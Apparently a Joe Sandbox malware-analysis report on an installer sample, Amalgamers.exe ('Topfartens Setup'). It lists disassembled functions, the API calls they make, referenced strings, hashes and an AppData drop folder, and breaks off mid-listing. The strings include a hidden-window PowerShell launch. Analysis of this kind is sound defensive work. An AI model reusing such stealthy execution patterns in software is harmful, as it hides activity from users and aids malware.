Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 108f0c184bcf7ed6d9d4fb864c0bf3485061875d4b02c085815a1bca3aa8a10b
Instruction ID: 8b31743f23cd8b0b58ed2b5f291beccc42c2d4f26c41c681c3135c74bfbc6718
Opcode Fuzzy Hash: 108f0c184bcf7ed6d9d4fb864c0bf3485061875d4b02c085815a1bca3aa8a10b
Instruction Fuzzy Hash: 9D027FB0A00209AFEB20DF55DD85AAE7BB5FB84314F14413AF610B62E1C7799D52CF58

Function 004044D1 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404520
SetWindowTextA.USER32(00000000,?), ref: 0040454A
SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045FB
CoTaskMemFree.OLE32(00000000), ref: 00404606
lstrcmpiA.KERNEL32(Execute: ,Topfartens Setup: Installing), ref: 00404638
lstrcatA.KERNEL32(?,Execute: ), ref: 00404644
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404656

Part of subcall function 004056A0: GetDlgItemTextA.USER32(?,?,00000400,0040468D), ref: 004056B3

Part of subcall function 0040620A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Amalgamers.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406262
Part of subcall function 0040620A: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
Part of subcall function 0040620A: CharNextA.USER32(?,"C:\Users\user\Desktop\Amalgamers.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406274
Part of subcall function 0040620A: CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406284

GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,?,00000001,00429840,?,?,000003FB,?), ref: 00404714
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040472F

Part of subcall function 00404888: lstrlenA.KERNEL32(Topfartens Setup: Installing,Topfartens Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
Part of subcall function 00404888: wsprintfA.USER32 ref: 0040492E
Part of subcall function 00404888: SetDlgItemTextA.USER32(?,Topfartens Setup: Installing), ref: 00404941

Strings

C:\Users\user\AppData\Local\Reglements216, xrefs: 00404621
Execute: , xrefs: 00404632, 00404637, 00404642
A, xrefs: 004045F4
Topfartens Setup: Installing, xrefs: 004045CE, 00404631
powershell.exe -windowstyle hidden, xrefs: 004044EA

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Reglements216$Execute: $Topfartens Setup: Installing$powershell.exe -windowstyle hidden
API String ID: 2624150263-1165901076
Opcode ID: 35ccfcd12aa65a6056ea3b79a366237fc8f8bc1b83ab477f5d53117e16670a8d
Instruction ID: e7408234a4186d1eb777f56003ea07db5a22e6c17a70b9954916109459a63af9
Opcode Fuzzy Hash: 35ccfcd12aa65a6056ea3b79a366237fc8f8bc1b83ab477f5d53117e16670a8d
Instruction Fuzzy Hash: EEA170B1900219ABDB11EFA6CD41AAF77B8EF85314F50843BF601B62D1DB7C89418B6D

Function 00405768 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405791
lstrcatA.KERNEL32(0042B878,\*.*,0042B878,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057D9
lstrcatA.KERNEL32(?,0040A014,?,0042B878,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057FA
lstrlenA.KERNEL32(?,?,0040A014,?,0042B878,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405800
FindFirstFileA.KERNEL32(0042B878,?,?,?,0040A014,?,0042B878,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405811
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058BE
FindClose.KERNEL32(00000000), ref: 004058CF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405775
"C:\Users\user\Desktop\Amalgamers.exe", xrefs: 00405768
\*.*, xrefs: 004057D3

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Amalgamers.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3891563557
Opcode ID: f32b864989338f25708692fe16fa07ece67d324431ed473f1cfad528f6b064ac
Instruction ID: 3130a24326b3cf8508e32ba03364d00ecd767046abd4d032e56f6a736b511150
Opcode Fuzzy Hash: f32b864989338f25708692fe16fa07ece67d324431ed473f1cfad528f6b064ac
Instruction Fuzzy Hash: AD519131900A05EAEF217B618C85BAF7A78DF42314F14817FF841B61E2D73C4952EE69

Function 004020D1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040851C,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402153
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402202

Strings

C:\Users\user\AppData\Local\Reglements216\Fessewise, xrefs: 00402193

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Reglements216\Fessewise
API String ID: 123533781-2812723231
Opcode ID: 00c6f69d0c611c55acbaeef9457f2e2871c7d6f88ec9903dd4d9a479ec053a50
Instruction ID: f4f88eda2e3132aa5920e2584167a74d80893369f9b2333c3bffcb98084fb778
Opcode Fuzzy Hash: 00c6f69d0c611c55acbaeef9457f2e2871c7d6f88ec9903dd4d9a479ec053a50
Instruction Fuzzy Hash: 44510771A00208BFCB10DFE4C989A9D7BB6AF48318F2085AAF515EB2D1DA799941CF54

Function 004026FE Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040270D

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 9a9d642bc180ce2e42395307b113c5168d8877eeb496379f1d9827102d39ec81
Instruction ID: 54a63a0b970f9f74e56537ecc54aa136cf23b82a2183361db5dda5742450debe
Opcode Fuzzy Hash: 9a9d642bc180ce2e42395307b113c5168d8877eeb496379f1d9827102d39ec81
Instruction Fuzzy Hash: 83F0EC72604151DBD700E7A49949DFEB76CDF11324FA0057BE181F20C1CABC8A459B3A

Function 0040677D Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82a44bc8fd526afdff965e1cd5e7f2d0a246497ca5c27b0c944ad4ba04d420dd
Instruction ID: c7d8350576d698755b4cacea6fe682166efb8a165fc05e4c5726b7f1812f50b8
Opcode Fuzzy Hash: 82a44bc8fd526afdff965e1cd5e7f2d0a246497ca5c27b0c944ad4ba04d420dd
Instruction Fuzzy Hash: F4E17971900706DFDB24CF58C880BAAB7F5FB44305F15842EE897A7291E738AA95CF54

Function 00406F54 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
Instruction ID: bf128a229d130661f6540426524f772d2f37fab74758cf72108bd9da8b00e916
Opcode Fuzzy Hash: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
Instruction Fuzzy Hash: 22C15931E042599BCF14CF68D4905EEB7B2FF89314F25826AD8567B380D738A942CF95

Function 004041AA Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404235
GetDlgItem.USER32(00000000,000003E8), ref: 00404249
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404267
GetSysColor.USER32(?), ref: 00404278
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404287
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404296
lstrlenA.KERNEL32(?), ref: 00404299
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042A8
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042BD
GetDlgItem.USER32(?,0000040A), ref: 0040431F
SendMessageA.USER32(00000000), ref: 00404322
GetDlgItem.USER32(?,000003E8), ref: 0040434D
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040438D
LoadCursorA.USER32(00000000,00007F02), ref: 0040439C
SetCursor.USER32(00000000), ref: 004043A5
LoadCursorA.USER32(00000000,00007F00), ref: 004043BB
SetCursor.USER32(00000000), ref: 004043BE
SendMessageA.USER32(00000111,00000001,00000000), ref: 004043EA
SendMessageA.USER32(00000010,00000000,00000000), ref: 004043FE

Strings

Execute: , xrefs: 00404378
uA@, xrefs: 004043A9
N, xrefs: 0040433B

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Execute: $N$uA@
API String ID: 3103080414-2670778696
Opcode ID: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
Instruction ID: fd9e69a661c90447e44b9af037de2c0158a1a23ec1d513a6b2b78bd76040a697
Opcode Fuzzy Hash: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
Instruction Fuzzy Hash: A26183B1A00205BFDB109F61DD45F6A7B69EB84705F10803AFB057A1D1C7B8A951CF58

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Topfartens Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

Topfartens Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Topfartens Setup
API String ID: 941294808-28998586
Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4

Function 00405C0F Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405DA0,?,?), ref: 00405C40
GetShortPathNameA.KERNEL32(?,0042C600,00000400), ref: 00405C49

Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0

GetShortPathNameA.KERNEL32(?,0042CA00,00000400), ref: 00405C66
wsprintfA.USER32 ref: 00405C84
GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405CBF
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405CCE
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D06
SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D5C
GlobalFree.KERNEL32(00000000), ref: 00405D6D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D74

Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\Amalgamers.exe,80000000,00000003), ref: 00405B3D
Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F

Strings

[Rename], xrefs: 00405CEE, 00405D00
%s=%s, xrefs: 00405C7A

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: f5205b29015aadf6075038324b6b1e83a67c9a1e7f2cc145563fcc6b36ef8083
Instruction ID: 165561d39814ef1f1a34b1aa6794dd1f6cd1d2ce27369611909fe2f807e8c01f
Opcode Fuzzy Hash: f5205b29015aadf6075038324b6b1e83a67c9a1e7f2cc145563fcc6b36ef8083
Instruction Fuzzy Hash: 5D310531200F19ABC2206B659D4DF6B3A5CDF45754F14443BFA01B62D2EA7CA8018EBD

Function 0040620A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Amalgamers.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406262
CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
CharNextA.USER32(?,"C:\Users\user\Desktop\Amalgamers.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406274
CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406284

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040620B
"C:\Users\user\Desktop\Amalgamers.exe", xrefs: 00406246
*?|<>/":, xrefs: 00406252

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Amalgamers.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3855946930
Opcode ID: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
Instruction ID: 9cd3e807bb29f508aa56cad56700fba7970b0901ce3b2fdefae83793710aaee6
Opcode Fuzzy Hash: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
Instruction Fuzzy Hash: 1411E26180479129EB327A385C40BB76FD84F57764F1A04FFE8C6722C2C67C5C6292AE

Function 004040A6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 004040C3
GetSysColor.USER32(00000000), ref: 00404101
SetTextColor.GDI32(?,00000000), ref: 0040410D
